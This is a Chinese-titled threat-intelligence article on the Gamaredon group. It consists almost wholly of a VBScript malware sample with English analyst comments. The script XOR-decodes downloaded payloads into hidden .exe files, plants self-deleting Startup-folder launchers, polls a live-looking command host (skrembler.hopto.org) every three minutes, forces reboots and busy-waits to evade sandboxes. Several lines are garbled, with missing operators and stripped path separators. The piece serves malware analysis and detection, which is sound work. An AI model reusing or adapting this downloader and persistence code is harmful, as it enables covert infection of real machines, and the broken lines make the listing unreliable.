俄罗斯组织Gamaredon近期活动分析

来源:岁月联盟 编辑:猪蛋儿 时间:2020-01-29
Set HHHm = CreateObject( “Scripting.FileSystemObject” )
If HHHm.FileExists( FCkE ) Then
Set NgjR = HHHm.GetFile( FCkE )
Set vHqt = NgjR.OpenAsTextStream( ForReading, TriStateFalse )
Else
vHqt.Close
Set vHqt = Nothing
Set NgjR = Nothing
Set HHHm = Nothing
Exit Function
End If
If HHHm.FileExists( BGmO ) Then
vHqt.Close
Set vHqt = Nothing
Set NgjR = Nothing
If HHHm.Fileexists( FCkE) Then HHHm.DeleteFile FCkE
Set HHHm = Nothing
Exit Function
Else
Set jIFy = HHHm.CreateTextFile( BGmO, True, False )
End If
set joCE = 0
Do Until vHqt.AtEndOfStream
For joCE = 0 To UBound( msKq )
joCE + 1 mod ( UBound( msKq ))
jIFy.Write Chr( Asc( vHqt.Read( 1 ) ) Xor msKq(joCE) )
if vHqt.AtEndOfStream Then Exit Do
Next
Loop
set joCE = 0
Do Until vHqt.AtEndOfStream
joCE = ( joCE + 1 ) ( UBound( msKq ) + 1 )
jIFy.Write Chr( Asc( vHqt.Read( 1 ) ) Xor msKq(mzrI) )
joCE=joCE+1
If mzrIThen
mzrI=mzrI+1
else mzrI=0
End If
Loop
jIFy.Close
If HHHm.Fileexists(FCkE) Then HHHm.DeleteFile FCkE
vHqt.Close
Set vHqt = Nothing
Set NgjR = Nothing
Set jIFy = Nothing
Set HHHm = Nothing
On Error Goto 0
End Function
' GetHKcc: turns the key string KCel into an array of character codes,
' one element per character, in order. In this listing the result is the
' key array that save passes to Encode.
Function GetHKcc( KCel )
Dim joCE, msKq( )
' One slot per character of the key (zero-based, so upper bound = length - 1).
ReDim msKq( Len( KCel ) - 1 )
For joCE = 0 To UBound( msKq )
' Mid is 1-based, hence joCE + 1.
msKq(joCE) = Asc( Mid( KCel, joCE + 1, 1 ) )
Next
GetHKcc = msKq
End Function
' pdBR: returns a string of QopZ characters picked with Rnd from a
' 36-character alphabet (a-z, 0-9).
' Analyst note: save calls pdBR(5) for the base name of the files it drops,
' so the file name differs per call; hunt on the 5-character [a-z0-9] name
' shape and the drop folder rather than on a fixed file name.
Function pdBR(ByVal QopZ)
Dim qsGf
' NOTE(review): the typographic quotes are how this page renders the sample;
' the original script presumably used straight quotes.
Const EhpF = “abcdefghijklmnopqrstuvwxyz0123456789”
' Seed the Rnd generator (no explicit seed argument is given).
Randomize
' joCE is not declared in this function.
For joCE = 1 To QopZ
' Int(36 * Rnd + 1) gives a 1-based index 1..36 into EhpF.
qsGf = qsGf & Mid(EhpF, Int(36 * Rnd + 1), 1)
Next
pdBR = qsGf
End Function
' save: writes the received bytes (data) to a randomly named .txt file, has
' Encode turn that file into an .exe using a key array, and, if the .exe
' exists, writes a .vbs launcher into the Startup folder.
' NOTE(review): the path literals have lost their backslashes on this page
' (presumably C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\ and
' ...\Microsoft\Windows\Start Menu\Programs\Startup\), and "Shyt" looks like
' the profile name of the analysed machine - confirm against the sample.
' Detection angle: a script host writing a .vbs file into a Startup folder,
' and an .exe with a 5-character [a-z0-9] name under the Excel folder in AppData.
Sub save(data)
Dim vNsF
vNsF = “1”
' Immediately overwritten: the base name is 5 random characters from pdBR.
vNsF = pdBR(5)
Set CQLk = CreateObject(“Scripting.FileSystemObject”)
Set jSmA = CreateObject(“ADODB.Stream”)
' From here on every runtime error is ignored, so any step below may fail silently.
On Error Resume Next
jSmA.Open
' Stream type 1 is binary in ADODB.
jSmA.Type = 1
jSmA.Write (data)
jSmA.Position = 0
Set CQLk = Nothing
' Stage 1: the raw (still encoded) payload is written to disk as <name>.txt.
jSmA.SaveToFile “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”
jSmA.Close
WScript.Sleep 7273
Set PaKX = CreateObject(“Scripting.FileSystemObject”)
Set lCPt = PaKX.GetFile(“C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”)
' NOTE(review): the comparison operator is missing on this page; presumably a
' size check that deletes files around or below 1025 bytes - confirm.
If lCPt.Size 1025 Then lCPt.Delete
Dim arrHKcc, kcEE
' Key for Encode. The same 8-character value appears in the request path of
' the main loop, so it is presumably host-specific - confirm.
arrHKcc = GetHKcc( “9AC9AA87”)
' Stage 2: Encode reads the .txt and writes the .exe with the key array
' (the visible part of Encode XORs each byte with a key element).
kcEE = Encode( “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”, “C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe”, arrHKcc )
WScript.Sleep 6425
' The staged .txt is removed, so only the decoded .exe stays on disk.
If PaKX.FileExists( “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt” ) Then PaKX.DeleteFile “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”
If PaKX.FileExists( “C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe” ) Then
' Stage 3: a launcher script is created in the Startup folder (third argument
' True = Unicode text), so the .exe is started at the next logon.
Set DeCQ = PaKX.CreateTextFile(“C:UsersShytAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup”+ vNsF +”.vbs”, True, True)
DeCQ.Write “On Error Resume Next” & vbCrLf
DeCQ.Write “Set PaKX = CreateObject(“”Scripting.FileSystemObject””)”& vbCrLf
' The launcher runs the .exe with window style 0 (hidden).
DeCQ.Write “createobject(“”Wscript.Shell””).run “”C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe””,0” & vbCrLf
' The launcher then deletes its own file, so the Startup entry is gone after
' it has run once; a Startup-folder check after logon may find nothing.
DeCQ.Write “PaKX.DeleteFile Wscript.ScriptFullName”& vbCrLf
DeCQ.Close
End If
' NOTE(review): the comparison operator is missing on this page; the branch
' body is empty either way.
If kcEE  0 Then
End If
End Sub
' Main loop: on each pass, sleep, hand the result of CZeq(<URL>) to save,
' then count the .exe files in the drop folder and reboot the machine
' through WMI once there are more than two.
' CZeq is not defined in this part of the listing; presumably it performs
' the HTTP request and returns the response body - confirm.
' Detection angle: a script host making a request of this shape roughly every
' three minutes, and a Win32 operating-system Reboot call issued from a script host.
hutC = 1
' hutC is never changed inside the loop, so the loop does not end by itself.
Do While hutC > 0
' 181224 ms, about three minutes between requests.
WScript.Sleep 181224
' NOTE(review): the path segment looks like <host name>_<8-character id>;
' the id equals the key string passed to GetHKcc in save.
save CZeq(“http://skrembler.hopto.org/WIN-IHN30SD7IMB_9AC9AA87/tor.php“)
Dim QKLN, zIvq, jJjj, CQLk
Set YDJG = CreateObject(“Scripting.FileSystemObject”)
' vNsF is declared with Dim inside save, so at this scope it is a different,
' unset variable; only the parent folder of the path is used here.
QKLN = YDJG.GetParentFolderName(“C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe”)
With WScript.CreateObject(“Scripting.FileSystemObject”)
Set HHHm = CreateObject(“Scripting.FileSystemObject”)
If HHHm.Fileexists(“C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”) Then HHHm.DeleteFile “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”
' Count the files with an .exe extension in the drop folder.
jJjj = 0
For Each zIvq In .GetFolder(QKLN).Files
If UCase(.GetExtensionName(zIvq.Name)) = UCase(“exe”) Then
jJjj = jJjj + 1
End If
Next
' More than two dropped executables: force a reboot, which triggers the
' Startup-folder launchers written by save at the next logon.
If (jJjj > 2) Then
Dim NYBz, IHEL, IHELSheck
' NOTE(review): the WMI moniker has lost characters on this page (backslashes,
' and presumably the underscore in the class name) - confirm against the sample.
Set NYBz = GetObject(“WinMgmts:{(Shutdown,RemoteShutdown)}!.RootCIMV2:Win32OperatingSystem”)
Set IHEL = NYBz.Instances
For Each IHELSheck In IHEL
IHELSheck.Reboot()
Next
End If
End With
Loop
程序最开始通过
' Start-up delay: sets a deadline 25 seconds ahead and spins in an empty
' loop until the clock passes it.
' NOTE(review): the page shows these statements fused on one line; the line
' breaks are restored here.
' Analyst note: the wait uses a busy loop rather than WScript.Sleep,
' presumably to outlast short automated analysis runs - confirm.
On Error Resume Next
Dim MTYj
MTYj = DateAdd("s", 25, Now())
Do Until (Now() > MTYj)
Loop
